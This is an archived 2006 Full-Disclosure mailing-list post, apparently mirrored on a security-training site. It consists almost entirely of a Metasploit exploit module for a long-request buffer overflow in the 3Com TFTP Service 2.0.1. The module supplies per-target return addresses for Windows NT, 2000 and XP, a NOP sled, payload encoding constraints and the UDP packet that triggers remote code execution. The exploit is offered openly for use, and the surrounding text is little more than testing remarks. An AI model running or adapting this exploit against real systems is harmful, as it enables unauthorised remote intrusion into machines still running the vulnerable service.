Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Bugtraq
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

[Full-disclosure] msf3 3Com TFTP exploit

from [Kurt Grutzmacher] Network Security [Permanent Link]
Subject: [Full-disclosure] msf3 3Com TFTP exploit
Date: Thu, 30 Nov 2006 10:03:22 -0600 
Doesn't look like SEH is being overwritten so I'm having trouble getting
this to work with DEP-enabled XPSP2 and 2K3. Tested on XPSP2 and Win2K. 
Includes offsets for NT, 2K and XP (call esi).

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

require 'msf/core'

module Msf

class Exploits::Windows::Tftp::ThreeCeeTftpSvc_Overflow < Msf::Exploit::Remote

        include Exploit::Remote::Udp

        def initialize(info = {})
                super(update_info(info,
                        'Name'           => '3CTftpSvc Server 2.0.1 Long 
Requesat Buffer Overflow',
                        'Description'    => %q{
                                3Com TFTP Service version 2.0.1 suffers from a 
long type buffer
                                overflow during a write TFTP request. Does not 
require write access
                                to be enabled on the server.

                                Attacker controls ESI.

                                Liu Qixu of NCNIPC published this vulnerability.
                        },
                        'Author'         => 'grutz [at] jingojango.net',
                        'Version'        => '$$',
                        'References'     => 
                                [ 
                                        ['URL', 
'http://support.3com.com/software/utilities_for_windows_32_bit.htm'],
                                        ['BID', '21301'],
                                ],
                        'DefaultOptions' =>
                                {
                                        'EXITFUNC' => 'thread',
                                },
                        'Payload'        =>
                                {
                                        'Space'    => 440,
                                        'BadChars' => "\x00",
                                        'StackAdjustment' => -3500,
                                },
                        'Platform'       => 'win',
                        
                        'Targets'        =>
                                [
                                        ['Windows 2000 All SP English',   { 
'Ret' => 0x750217ae } ], # call esi ws2help
                                        ['Windows XP SP2 English',        { 
'Ret' => 0x71aa1b22 } ], # call esi ws2help
                                        ['Windows NT SP5/6 English',      { 
'Ret' => 0x776a117e } ], # call esi ws2help
                                ],

                        'DefaultTarget'  => 0,
                        'Privileged'     => false,
                        'DisclosureDate' => 'Nov 27 2006'

                        ))

                        register_options(
                                [
                                                Opt::RPORT(69)
                                ], self)

        end

        def exploit
                connect_udp

                print_status("Trying target #{target.name}...")

                sploit = 
                        "\x00\x02" + 
                        Rex::Text.rand_text_english(1, payload_badchars) + 
                        "\x00" +
                        make_nops(473) +
                        [target.ret].pack('V') +
                        "\x00"
                        
        sploit[9, payload.encoded.length] = payload.encoded

                udp_sock.put(sploit)
                
                disconnect_udp          
        end

end
end


-- 
                 ..:[ grutz at jingojango dot net ]:..
     GPG fingerprint: 5FD6 A27D 63DB 3319 140F  B3FB EC95 2A03 8CB3 ECB4
        "There's just no amusing way to say, 'I have a CISSP'."

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[More messages with this same subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • [Full-disclosure] msf3 3Com TFTP exploit, Kurt Grutzmacher <=
Previous by Date:  Re: [Full-disclosure] ZDI-06-043: Novell Netware Client Print Provider Buffer Overflow Vulnerability, Dude VanWinkle
Next by Date:  [Full-disclosure] iDefense Security Advisory 11.30.06: Multiple Vendor libgsf Heap Overflow Vulnerability, iDefense Labs
Previous by Thread:  [Full-disclosure] [USN-389-1] GnuPG vulnerability, Kees Cook
Next by Thread:  [Full-disclosure] iDefense Security Advisory 11.30.06: Multiple Vendor libgsf Heap Overflow Vulnerability, iDefense Labs
Indexes:  [Date] [Thread] [Top] [All Lists]